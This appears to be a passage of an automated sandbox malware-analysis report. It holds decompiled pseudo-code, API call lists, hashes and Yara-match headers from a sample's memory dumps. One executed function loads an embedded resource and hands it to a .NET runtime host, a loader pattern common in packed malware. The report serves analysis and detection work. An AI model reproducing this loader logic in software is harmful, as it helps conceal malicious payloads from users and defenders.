                                                                      0x00beecfb
                                                                      0x00beece7
                                                                      0x00beed32
                                                                      0x00beed36
                                                                      0x00beecc6
                                                                      0x00beecde
                                                                      0x00beecde
                                                                      0x00beecc4

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.224908255.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000001.00000002.224904531.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224920014.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224925639.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224930208.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                      • String ID:
                                                                      • API String ID: 3016257755-0
                                                                      • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                      • Instruction ID: 9ac2ca31c2413f0dda20717c1a415e629db1479747029a102037861af906c709
                                                                      • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                      • Instruction Fuzzy Hash: 6B014B3244018EFBCF125E85CC428EE3FA2FF18354F5884A5FA2959231D336D9B1AB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 92%
                                                                      			E00BECC10(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                      				LONG* _t20;
                                                                      				signed int _t25;
                                                                      				void* _t31;
                                                                      				LONG* _t33;
                                                                      				void* _t34;
                                                                      				void* _t35;
                                                                      
                                                                      				_t35 = __eflags;
                                                                      				_t29 = __edx;
                                                                      				_t24 = __ebx;
                                                                      				_push(0xc);
                                                                      				_push(0xbfd9a0);
                                                                      				E00BE9160(__ebx, __edi, __esi);
                                                                      				_t31 = E00BED59F(__edx, __edi, _t35);
                                                                      				_t25 =  *0xc01c6c; // 0xfffffffe
                                                                      				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                      					E00BEBE5F(0xd);
                                                                      					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                      					_t33 =  *(_t31 + 0x68);
                                                                      					 *(_t34 - 0x1c) = _t33;
                                                                      					__eflags = _t33 -  *0xc01524; // 0xc01820
                                                                      					if(__eflags != 0) {
                                                                      						__eflags = _t33;
                                                                      						if(__eflags != 0) {
                                                                      							__eflags = InterlockedDecrement(_t33);
                                                                      							if(__eflags == 0) {
                                                                      								__eflags = _t33 - 0xc01820;
                                                                      								if(__eflags != 0) {
                                                                      									E00BE8F53(_t33);
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						_t20 =  *0xc01524; // 0xc01820
                                                                      						 *(_t31 + 0x68) = _t20;
                                                                      						_t33 =  *0xc01524; // 0xc01820
                                                                      						 *(_t34 - 0x1c) = _t33;
                                                                      						InterlockedIncrement(_t33);
                                                                      					}
                                                                      					 *(_t34 - 4) = 0xfffffffe;
                                                                      					E00BECCAC();
                                                                      				} else {
                                                                      					_t33 =  *(_t31 + 0x68);
                                                                      				}
                                                                      				_t38 = _t33;
                                                                      				if(_t33 == 0) {
                                                                      					E00BE751F(_t24, _t29, _t31, _t33, _t38, 0x20);
                                                                      				}
                                                                      				return E00BE91A5(_t33);
                                                                      			}









                                                                      0x00becc10
                                                                      0x00becc10
                                                                      0x00becc10
                                                                      0x00becc10
                                                                      0x00becc12
                                                                      0x00becc17
                                                                      0x00becc21
                                                                      0x00becc23
                                                                      0x00becc2c
                                                                      0x00becc4d
                                                                      0x00becc53
                                                                      0x00becc57
                                                                      0x00becc5a
                                                                      0x00becc5d
                                                                      0x00becc63
                                                                      0x00becc65
                                                                      0x00becc67
                                                                      0x00becc70
                                                                      0x00becc72
                                                                      0x00becc74
                                                                      0x00becc7a
                                                                      0x00becc7d
                                                                      0x00becc82
                                                                      0x00becc7a
                                                                      0x00becc72
                                                                      0x00becc83
                                                                      0x00becc88
                                                                      0x00becc8b
                                                                      0x00becc91
                                                                      0x00becc95
                                                                      0x00becc95
                                                                      0x00becc9b
                                                                      0x00becca2
                                                                      0x00becc34
                                                                      0x00becc34
                                                                      0x00becc34
                                                                      0x00becc37
                                                                      0x00becc39
                                                                      0x00becc3d
                                                                      0x00becc42
                                                                      0x00becc4a

                                                                      APIs
                                                                        • Part of subcall function 00BED59F: __getptd_noexit.LIBCMT ref: 00BED5A0
                                                                      • __lock.LIBCMT ref: 00BECC4D
                                                                      • InterlockedDecrement.KERNEL32(?,00BFD9A0,0000000C,00BE78B5,?,?,00BF3C8E,?), ref: 00BECC6A
                                                                      • _free.LIBCMT ref: 00BECC7D
                                                                      • InterlockedIncrement.KERNEL32(00C01820,00BFD9A0,0000000C,00BE78B5,?,?,00BF3C8E,?), ref: 00BECC95
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.224908255.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000001.00000002.224904531.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224920014.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224925639.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224930208.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                      • String ID:
                                                                      • API String ID: 2704283638-0
                                                                      • Opcode ID: 0dcabbbe5cc610eef47595a52a7f89b13570938dfc42617c9af1859baed1bc18
                                                                      • Instruction ID: 66a41be862b8f9fea405264ba38939e602f9bf06228b36439bb2499a2b09d01b
                                                                      • Opcode Fuzzy Hash: 0dcabbbe5cc610eef47595a52a7f89b13570938dfc42617c9af1859baed1bc18
                                                                      • Instruction Fuzzy Hash: 0901D232901A51ABD725AB6B980579EBBE0FF44710F294189ED0867391CB306E43CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 83%
                                                                      			E00BE1B30(intOrPtr _a12) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				char _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				char _v45;
                                                                      				short _v47;
                                                                      				char _v51;
                                                                      				char _v55;
                                                                      				char _v59;
                                                                      				char _v63;
                                                                      				char _v64;
                                                                      				intOrPtr _v68;
                                                                      				char _v71;
                                                                      				char _v75;
                                                                      				char _v79;
                                                                      				char _v80;
                                                                      				char _v92;
                                                                      				char _v167;
                                                                      				char _v168;
                                                                      				signed int _t163;
                                                                      				signed int _t177;
                                                                      				signed int _t178;
                                                                      				void* _t186;
                                                                      				intOrPtr _t189;
                                                                      				void* _t292;
                                                                      				void* _t293;
                                                                      				void* _t294;
                                                                      
                                                                      				_v64 = 0;
                                                                      				_v63 = 0;
                                                                      				_v59 = 0;
                                                                      				_v55 = 0;
                                                                      				_v51 = 0;
                                                                      				_v47 = 0;
                                                                      				_v45 = 0;
                                                                      				_v80 = 0;
                                                                      				_v79 = 0;
                                                                      				_v75 = 0;
                                                                      				_v71 = 0;
                                                                      				_v168 = 0;
                                                                      				_t163 = E00BE87A0( &_v167, 0, 0x31);
                                                                      				_t294 = _t293 + 0xc;
                                                                      				asm("cvttsd2si eax, [ebp+0x8]");
                                                                      				_v16 = _t163;
                                                                      				asm("cdq");
                                                                      				 *(_t292 + 0xffffffffffffffa4) = _v16 % 0x3e8;
                                                                      				asm("cdq");
                                                                      				_v16 = _v16 / 0x3e8;
                                                                      				_v8 = 4;
                                                                      				while(_v8 >= 0) {
                                                                      					asm("cdq");
                                                                      					 *(_t292 + _v8 * 4 - 0x70) = _v16 % 0x64;
                                                                      					asm("cdq");
                                                                      					_v16 = _v16 / 0x64;
                                                                      					_v8 = _v8 - 1;
                                                                      				}
                                                                      				_v36 =  *(_t292 + 0xffffffffffffffa4);
                                                                      				asm("cdq");
                                                                      				_v20 = _v36 / 0x64;
                                                                      				asm("cdq");
                                                                      				_v12 = _v36 % 0x64;
                                                                      				asm("cdq");
                                                                      				_v40 = _v12 / 0xa;
                                                                      				_t177 = _v12;
                                                                      				asm("cdq");
                                                                      				_t178 = _t177 / 0xa;
                                                                      				_v44 = _t177 % 0xa;
                                                                      				if(_v12 >= 0x14 || _v20 == 0) {
                                                                      					if(_v12 >= 0x14 || _v20 != 0) {
                                                                      						if(_v12 <= 0x14 || _v20 == 0) {
                                                                      							E00BE1E50(_t178, _v40,  &_v92);
                                                                      							E00BE1E40( &_v32, _v44,  &_v32);
                                                                      							E00BE8140( &_v64,  &_v32);
                                                                      							_t294 = _t294 + 8;
                                                                      						} else {
                                                                      							E00BE1E40(_v20, _v20,  &_v32);
                                                                      							E00BE8140( &_v64, "Hundred ");
                                                                      							E00BE1E50(_v40, _v40,  &_v92);
                                                                      							E00BE8140( &_v64,  &_v92);
                                                                      							E00BE1E40( &_v32, _v44,  &_v32);
                                                                      							E00BE8140( &_v64,  &_v32);
                                                                      							_t294 = _t294 + 0x18;
                                                                      						}
                                                                      					} else {
                                                                      						E00BE1E40( &_v32, _v12,  &_v32);
                                                                      					}
                                                                      				} else {
                                                                      					E00BE1E40(_v20, _v20,  &_v32);
                                                                      					E00BE8140( &_v64, "Hundred ");
                                                                      					E00BE1E40(_v12, _v12,  &_v32);
                                                                      					E00BE8140( &_v64,  &_v32);
                                                                      					_t294 = _t294 + 0x10;
                                                                      				}
                                                                      				_v8 = 4;
                                                                      				while(_v8 >= 0) {
                                                                      					if( *(_t292 + _v8 * 4 - 0x70) >= 0x14) {
                                                                      						asm("cdq");
                                                                      						E00BE1E50( *(_t292 + _v8 * 4 - 0x70) / 0xa,  *(_t292 + _v8 * 4 - 0x70) / 0xa,  &_v92);
                                                                      						asm("cdq");
                                                                      						E00BE1E40( *(_t292 + _v8 * 4 - 0x70) / 0xa,  *(_t292 + _v8 * 4 - 0x70) % 0xa,  &_v32);
                                                                      						E00BE8140(_t292 + _v8 * 0x1e - 0x13c,  &_v32);
                                                                      						_t294 = _t294 + 8;
                                                                      					} else {
                                                                      						E00BE1E40( &_v32,  *(_t292 + _v8 * 4 - 0x70),  &_v32);
                                                                      					}
                                                                      					_v8 = _v8 - 1;
                                                                      				}
                                                                      				_v8 = 0;
                                                                      				while(_v8 < 5) {
                                                                      					_t189 = E00BE82C0(_t292 + _v8 * 0x1e - 0x13c);
                                                                      					_t294 = _t294 + 4;
                                                                      					_v68 = _t189;
                                                                      					if(_v68 != 0) {
                                                                      						E00BE8140( &_v168, _t292 + _v8 * 0x1e - 0x13c);
                                                                      						E00BE8140( &_v168,  &_v80);
                                                                      						_t294 = _t294 + 0x10;
                                                                      					}
                                                                      					_v8 = _v8 + 1;
                                                                      				}
                                                                      				E00BE8140(_a12,  &_v64);
                                                                      				_t186 = E00BE82C0(_a12);
                                                                      				 *((char*)(_a12 + _t186 - 1)) = 0;
                                                                      				return _t186;
                                                                      			}


































                                                                      0x00be1b39
                                                                      0x00be1b3f
                                                                      0x00be1b42
                                                                      0x00be1b45
                                                                      0x00be1b48
                                                                      0x00be1b4b
                                                                      0x00be1b4f
                                                                      0x00be1b52
                                                                      0x00be1b58
                                                                      0x00be1b5b
                                                                      0x00be1b5e
                                                                      0x00be1b61
                                                                      0x00be1b73
                                                                      0x00be1b78
                                                                      0x00be1b7b
                                                                      0x00be1b80
                                                                      0x00be1b86
                                                                      0x00be1b96
                                                                      0x00be1b9d
                                                                      0x00be1ba5
                                                                      0x00be1ba8
                                                                      0x00be1bba
                                                                      0x00be1bc3
                                                                      0x00be1bce
                                                                      0x00be1bd5
                                                                      0x00be1bdd
                                                                      0x00be1bb7
                                                                      0x00be1bb7
                                                                      0x00be1bee
                                                                      0x00be1bf4
                                                                      0x00be1bfc
                                                                      0x00be1c02
                                                                      0x00be1c0a
                                                                      0x00be1c10
                                                                      0x00be1c18
                                                                      0x00be1c1b
                                                                      0x00be1c1e
                                                                      0x00be1c24
                                                                      0x00be1c26
                                                                      0x00be1c2d
                                                                      0x00be1c79
                                                                      0x00be1c97
                                                                      0x00be1d01
                                                                      0x00be1d0e
                                                                      0x00be1d1b
                                                                      0x00be1d20
                                                                      0x00be1c9f
                                                                      0x00be1ca7
                                                                      0x00be1cb5
                                                                      0x00be1cc5
                                                                      0x00be1cd2
                                                                      0x00be1ce2
                                                                      0x00be1cef
                                                                      0x00be1cf4
                                                                      0x00be1cf4
                                                                      0x00be1c81
                                                                      0x00be1c89
                                                                      0x00be1c89
                                                                      0x00be1c35
                                                                      0x00be1c3d
                                                                      0x00be1c4b
                                                                      0x00be1c5b
                                                                      0x00be1c68
                                                                      0x00be1c6d
                                                                      0x00be1c6d
                                                                      0x00be1d23
                                                                      0x00be1d35
                                                                      0x00be1d43
                                                                      0x00be1d63
                                                                      0x00be1d6c
                                                                      0x00be1d7c
                                                                      0x00be1d85
                                                                      0x00be1d9c
                                                                      0x00be1da1
                                                                      0x00be1d45
                                                                      0x00be1d51
                                                                      0x00be1d51
                                                                      0x00be1d32
                                                                      0x00be1d32
                                                                      0x00be1da6
                                                                      0x00be1db8
                                                                      0x00be1dcc
                                                                      0x00be1dd1
                                                                      0x00be1dd4
                                                                      0x00be1ddb
                                                                      0x00be1df2
                                                                      0x00be1e05
                                                                      0x00be1e0a
                                                                      0x00be1e0a
                                                                      0x00be1db5
                                                                      0x00be1db5
                                                                      0x00be1e17
                                                                      0x00be1e23
                                                                      0x00be1e2e
                                                                      0x00be1e36

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.224908255.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000001.00000002.224904531.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224920014.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224925639.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224930208.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _memset
                                                                      • String ID: Hundred $Hundred
                                                                      • API String ID: 2102423945-1478457770
                                                                      • Opcode ID: 83974acbcf6e75925c495d583302e9f9beabcc88f5504bdf396f008d63f4a0d9
                                                                      • Instruction ID: 0a791c8639c680a12c836e8eeb3802daf9430037c8333cd884c7c27bf145b6d9
                                                                      • Opcode Fuzzy Hash: 83974acbcf6e75925c495d583302e9f9beabcc88f5504bdf396f008d63f4a0d9
                                                                      • Instruction Fuzzy Hash: 5FA130B1D00248EBCB04DFE9D881AEDB7F9EF48300F2089A9F515A7251EB759A05CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 78%
                                                                      			E00BEF71C(void* __ebx, void* __edx, void* __esi, void* __eflags) {
                                                                      				intOrPtr* _v20;
                                                                      				void* _t4;
                                                                      				intOrPtr* _t7;
                                                                      				intOrPtr _t9;
                                                                      
                                                                      				_t15 = __edx;
                                                                      				_t13 = __ebx;
                                                                      				_t4 = E00BF3C1F(0, 0x10000, 0x30000);
                                                                      				if(_t4 != 0) {
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					E00BE8B87(__ebx, __edx);
                                                                      					asm("int3");
                                                                      					_t7 =  *_v20;
                                                                      					__eflags =  *_t7 - 0xe06d7363;
                                                                      					if( *_t7 != 0xe06d7363) {
                                                                      						L9:
                                                                      						__eflags = 0;
                                                                      						return 0;
                                                                      					} else {
                                                                      						__eflags =  *((intOrPtr*)(_t7 + 0x10)) - 3;
                                                                      						if( *((intOrPtr*)(_t7 + 0x10)) != 3) {
                                                                      							goto L9;
                                                                      						} else {
                                                                      							_t9 =  *((intOrPtr*)(_t7 + 0x14));
                                                                      							__eflags = _t9 - 0x19930520;
                                                                      							if(__eflags == 0) {
                                                                      								L10:
                                                                      								E00BEC6A9(_t13, _t15, 0, __eflags);
                                                                      								asm("int3");
                                                                      								E00BEC080(E00BEF743);
                                                                      								__eflags = 0;
                                                                      								return 0;
                                                                      							} else {
                                                                      								__eflags = _t9 - 0x19930521;
                                                                      								if(__eflags == 0) {
                                                                      									goto L10;
                                                                      								} else {
                                                                      									__eflags = _t9 - 0x19930522;
                                                                      									if(__eflags == 0) {
                                                                      										goto L10;
                                                                      									} else {
                                                                      										__eflags = _t9 - 0x1994000;
                                                                      										if(__eflags == 0) {
                                                                      											goto L10;
                                                                      										} else {
                                                                      											goto L9;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					return _t4;
                                                                      				}
                                                                      			}







                                                                      0x00bef71c
                                                                      0x00bef71c
                                                                      0x00bef72a
                                                                      0x00bef734
                                                                      0x00bef738
                                                                      0x00bef739
                                                                      0x00bef73a
                                                                      0x00bef73b
                                                                      0x00bef73c
                                                                      0x00bef73d
                                                                      0x00bef742
                                                                      0x00bef749
                                                                      0x00bef74b
                                                                      0x00bef751
                                                                      0x00bef778
                                                                      0x00bef778
                                                                      0x00bef77b
                                                                      0x00bef753
                                                                      0x00bef753
                                                                      0x00bef757
                                                                      0x00000000
                                                                      0x00bef759
                                                                      0x00bef759
                                                                      0x00bef75c
                                                                      0x00bef761
                                                                      0x00bef77e
                                                                      0x00bef77e
                                                                      0x00bef783
                                                                      0x00bef789
                                                                      0x00bef78f
                                                                      0x00bef791
                                                                      0x00bef763
                                                                      0x00bef763
                                                                      0x00bef768
                                                                      0x00000000
                                                                      0x00bef76a
                                                                      0x00bef76a
                                                                      0x00bef76f
                                                                      0x00000000
                                                                      0x00bef771
                                                                      0x00bef771
                                                                      0x00bef776
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bef776
                                                                      0x00bef76f
                                                                      0x00bef768
                                                                      0x00bef761
                                                                      0x00bef757
                                                                      0x00bef736
                                                                      0x00bef737
                                                                      0x00bef737

                                                                      APIs
                                                                      • __controlfp_s.LIBCMT ref: 00BEF72A
                                                                        • Part of subcall function 00BF3C1F: __control87.LIBCMT ref: 00BF3C43
                                                                      • __invoke_watson.LIBCMT ref: 00BEF73D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.224908255.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000001.00000002.224904531.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224920014.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224925639.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224930208.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: __control87__controlfp_s__invoke_watson
                                                                      • String ID: csm
                                                                      • API String ID: 1371525046-1018135373
                                                                      • Opcode ID: c31a43782f43f11a0a3de5972e39fa5d561af5f85f38c041d28986b5f2b22f0f
                                                                      • Instruction ID: c7586dc2c4cefe63a9697c8a0b49dd244d3a1f0eed497e228ba7a4d9aca9b0b4
                                                                      • Opcode Fuzzy Hash: c31a43782f43f11a0a3de5972e39fa5d561af5f85f38c041d28986b5f2b22f0f
                                                                      • Instruction Fuzzy Hash: 94F090222102465B8E29A96BA846ABE37CDDB10352B6446E1F9088A5A5DF70CF81C0D6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 41%
                                                                      			E00BE6B80(void* __ecx) {
                                                                      				void* _v8;
                                                                      				void* _t5;
                                                                      				void* _t7;
                                                                      				void* _t14;
                                                                      
                                                                      				_t14 = __ecx;
                                                                      				_push(__ecx);
                                                                      				_t5 = HeapAlloc(GetProcessHeap(), 1, 0x17d78400);
                                                                      				_v8 = _t5;
                                                                      				_push(_t5);
                                                                      				if(_t5 != 0x11) {
                                                                      					asm("cld");
                                                                      				}
                                                                      				asm("clc");
                                                                      				_pop(_t7);
                                                                      				if(_v8 != 0) {
                                                                      					E00BE6C50(_t14, _v8, 0x17d78400);
                                                                      					_push(_t11);
                                                                      					asm("cld");
                                                                      					_t7 = HeapAlloc(GetProcessHeap(), 1, 0);
                                                                      				}
                                                                      				return _t7;
                                                                      			}







                                                                      0x00be6b80
                                                                      0x00be6b83
                                                                      0x00be6b93
                                                                      0x00be6b99
                                                                      0x00be6b9c
                                                                      0x00be6ba0
                                                                      0x00be6ba4
                                                                      0x00be6ba5
                                                                      0x00be6ba9
                                                                      0x00be6baa
                                                                      0x00be6baf
                                                                      0x00be6bbd
                                                                      0x00be6bc2
                                                                      0x00be6bc7
                                                                      0x00be6bd4
                                                                      0x00be6bd4
                                                                      0x00be6bde

                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000001,17D78400,00000000,?,?,00BE1060,?,00BE89A2,00BE0000,00000000,00000000), ref: 00BE6B8C
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,00BE1060,?,00BE89A2,00BE0000,00000000,00000000), ref: 00BE6B93
                                                                      • GetProcessHeap.KERNEL32(00000001,00000000,00000000,17D78400,?,?,00BE1060,?,00BE89A2,00BE0000,00000000,00000000), ref: 00BE6BCD
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,00BE1060,?,00BE89A2,00BE0000,00000000,00000000), ref: 00BE6BD4
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.224908255.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000001.00000002.224904531.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224920014.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224925639.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224930208.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: 378d23a1391dd610e2a12dc8761dbd8589bb7337e6c12385526f3420a4b8529c
                                                                      • Instruction ID: fe7596bf68533ac197e23db7ef44e7946579fa9e20057aeb973564640b7c01f0
                                                                      • Opcode Fuzzy Hash: 378d23a1391dd610e2a12dc8761dbd8589bb7337e6c12385526f3420a4b8529c
                                                                      • Instruction Fuzzy Hash: 2FF05E71541258BFEB0067B5AC4EBBFB7DCE705709FA00594F505D3250DE725E08C664
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Executed Functions

                                                                      C-Code - Quality: 100%
                                                                      			E00401489() {
                                                                      				void* _v8;
                                                                      				struct HRSRC__* _t4;
                                                                      				long _t10;
                                                                      				struct HRSRC__* _t12;
                                                                      				void* _t16;
                                                                      
                                                                      				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
                                                                      				_t12 = _t4;
                                                                      				if(_t12 == 0) {
                                                                      					L6:
                                                                      					ExitProcess(0);
                                                                      				}
                                                                      				_t16 = LoadResource(GetModuleHandleW(0), _t12);
                                                                      				if(_t16 != 0) {
                                                                      					_v8 = LockResource(_t16);
                                                                      					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
                                                                      					_t13 = _v8;
                                                                      					if(_v8 != 0 && _t10 != 0) {
                                                                      						L00401000(_t13, _t10); // executed
                                                                      					}
                                                                      				}
                                                                      				FreeResource(_t16);
                                                                      				goto L6;
                                                                      			}








                                                                      0x0040149f
                                                                      0x004014a5
                                                                      0x004014a9
                                                                      0x004014ec
                                                                      0x004014ee
                                                                      0x004014ee
                                                                      0x004014b7
                                                                      0x004014bb
                                                                      0x004014c7
                                                                      0x004014cd
                                                                      0x004014d3
                                                                      0x004014d8
                                                                      0x004014e0
                                                                      0x004014e0
                                                                      0x004014d8
                                                                      0x004014e6
                                                                      0x00000000

                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                                                                      • FindResourceW.KERNEL32(00000000,?,?,80004003), ref: 0040149F
                                                                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                                                                      • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                                                                      • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                                                                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                                                                      • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                                                                        • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                                                                      • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                                                                      • ExitProcess.KERNEL32 ref: 004014EE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.585204726.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                                                                      • String ID: v4.0.30319
                                                                      • API String ID: 2372384083-3152434051
                                                                      • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                                                                      • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                                                                      • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                                                                      • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00401E1D() {
                                                                      				_Unknown_base(*)()* _t1;
                                                                      
                                                                      				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
                                                                      				return _t1;
                                                                      			}




                                                                      0x00401e22
                                                                      0x00401e28

                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00001E29,00401716), ref: 00401E22
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.585204726.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                                                                      • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                                                                      • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                                                                      • Instruction Fuzzy Hash:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32 ref: 029569A0
                                                                      • GetCurrentThread.KERNEL32 ref: 029569DD
                                                                      • GetCurrentProcess.KERNEL32 ref: 02956A1A
                                                                      • GetCurrentThreadId.KERNEL32 ref: 02956A73
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.588922090.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Current$ProcessThread
                                                                      • String ID:
                                                                      • API String ID: 2063062207-0
                                                                      • Opcode ID: 1bf152b374221cabd8b27db4034eab16fd0155d7205d86b3e63066aa83202ce0
                                                                      • Instruction ID: c361a167a4e534e54434fefae911612b159eb658c1bf6abb011f3bc410d8db07
                                                                      • Opcode Fuzzy Hash: 1bf152b374221cabd8b27db4034eab16fd0155d7205d86b3e63066aa83202ce0
                                                                      • Instruction Fuzzy Hash: 495178B0A043898FDB10CFA9D9887DEBFF4EF59304F24859AE459A7261C7345984CF62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32 ref: 029569A0
                                                                      • GetCurrentThread.KERNEL32 ref: 029569DD
                                                                      • GetCurrentProcess.KERNEL32 ref: 02956A1A
                                                                      • GetCurrentThreadId.KERNEL32 ref: 02956A73
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.588922090.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Current$ProcessThread
                                                                      • String ID:
                                                                      • API String ID: 2063062207-0
                                                                      • Opcode ID: 55983f19381e99082dfee102d8a070586faa741b1d3e269eabc13a31b16f72bf
                                                                      • Instruction ID: c15bef8188330cfb44dd1b5425cc6f79e2c19b9f3eaff73e8a789aa5286883ad
                                                                      • Opcode Fuzzy Hash: 55983f19381e99082dfee102d8a070586faa741b1d3e269eabc13a31b16f72bf
                                                                      • Instruction Fuzzy Hash: 805146B4A04249CFDB14CFA9D688B9EBBF4FF48308F248599E819A7750C7749884CF65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004055C5(void* __ecx) {
                                                                      				void* _t6;
                                                                      				void* _t14;
                                                                      				void* _t18;
                                                                      				WCHAR* _t19;
                                                                      
                                                                      				_t14 = __ecx;
                                                                      				_t19 = GetEnvironmentStringsW();
                                                                      				if(_t19 != 0) {
